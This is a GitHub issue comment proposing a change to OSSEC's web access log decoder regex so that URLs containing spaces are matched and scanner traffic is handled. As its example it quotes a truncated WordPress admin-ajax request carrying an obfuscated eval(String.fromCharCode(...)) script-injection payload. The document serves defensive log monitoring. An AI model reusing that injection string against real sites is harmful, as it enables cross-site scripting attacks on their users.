Open colinmollenhour opened 8 years ago
I second this. Using (\.+)
instead of (\S+)
will allow us to decode requests like this:
EDIT: Even with (\.+)
, OSSEC still does not match the request below.
http://domain.com/wp-admin/admin-ajax.php?action=update_zb_fbc_code&domain=</script><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, ..., 41, 59, 10, 125));</script>
Right now those requests end in a level 13 alert:
Rule: 1003 fired (level 13) -> "Non standard syslog message (size too large)."
While this is an edge case that is not representative of normal web requests, there are requests that may be logged by the web server that are not matched by the current decoder. The cases I've see are triggered by security scanners/sniffers which are arguably the most important requests to match since OSSEC cannot take proper action if it cannot match the right decoder.
Example from an nginx log:
This results in an alert:
I added a decoder to local_decoders.xml which does match the request:
However, I think that this change should be made in the "web-accesslog" decoder directly. Specifically, the "\S+" used to match the url should be ".+" to allow spaces in the url.